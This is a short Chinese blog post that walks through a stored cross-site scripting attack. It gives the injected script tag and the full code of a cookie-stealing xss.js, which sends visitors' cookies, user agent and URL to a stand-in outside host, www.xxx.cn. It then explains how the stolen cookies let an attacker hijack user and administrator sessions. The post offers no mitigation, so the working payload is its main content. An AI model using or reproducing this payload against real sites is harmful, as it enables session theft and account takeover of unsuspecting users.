一次XSS攻击过程


1.一个录入数据的地方,没做转义检测【例如用户录入需求的地方】
2.用户录入了如下数据
<script src=http://www.xxx.cn/xss.js></script>
    该内容会展示给所有访问网站主页的用户【尤其是管理员】
3.xss.js 内容如下 
var cookie = escape(document.cookie);
var agent = escape(window.navigator.userAgent);
var url = escape(window.location.href);
var host = escape(window.location.host);
x=new Image();
x.src="http://www.xxx.cn/index.php?cookie="+cookie+"&agent="+agent+"&url="+url+"&host="+host;
由于xss.js被所有访问网站主页的用户访问。
所有用户的cookie被提取存入到www.xxx.cn
4.此时,黑客即可拿出任意cookie,模拟该对应用户访问网站,获得此用户权限,去处置该用户的各项数据
还有可能得到管理员的cookie,去完暴此网站的菊花
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值